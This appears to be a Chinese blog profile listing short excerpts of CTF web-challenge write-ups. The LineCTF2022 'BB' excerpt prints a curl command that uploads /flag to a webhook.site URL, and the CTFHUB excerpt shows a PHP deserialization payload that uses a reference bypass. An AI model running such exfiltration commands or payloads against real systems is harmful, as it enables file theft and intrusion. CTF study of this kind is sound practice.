- 博客(4)
- 收藏
- 关注
原创 ctfer的web日常:给你shell (ctfshow)
因为数字与0xC0为0;所有可以得知$flag_md5前3位为数字;故secret = 115满足$obj['secret']!查看源码,发现“/?发现好多东西都被禁了;
2024-03-21 22:32:22
721
1
原创 ctfer的日常web:[LineCTF2022]BB(buuctf)
向指定的 webhook 站点[]发送一个 POST 请求,并上传了一个名为 flag 的文件。b"curl https://webhook.site/a27433a-afdb-9d9a080beb55 -F flag=@/flag"这个命令的具体含义如下:curl: 是一个命令行工具,用于在终端中传输数据,支持多种协议。https://webhook.site/a278d631-e3e5-433a-afdb-9d9a080beb55: 这是一个 webhook 站点的 URL,其中包含。。。。。。
2024-03-09 22:43:41
551
1
原创 ctfer的日常web:pklovecloud(CTFHUB)
ctfer的日常web:pklovecloud(CTFHUB),php反序列化,R:2, 绕过....在 PHP 的序列化字符串中,R: 表示一个引用。在你提供的序列化字符串中,R:2; 表示引用编号为 2 的对象。这意味着,在反序列化这个字符串时,属性 "nova" 的值将是之前引用编号为 2 的对象所指向的值。即:O:8:"stdClass":2:{s:7:"neutron";s:1:"a";s:4:"nova";R:2;}
2024-03-06 23:21:51
743
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人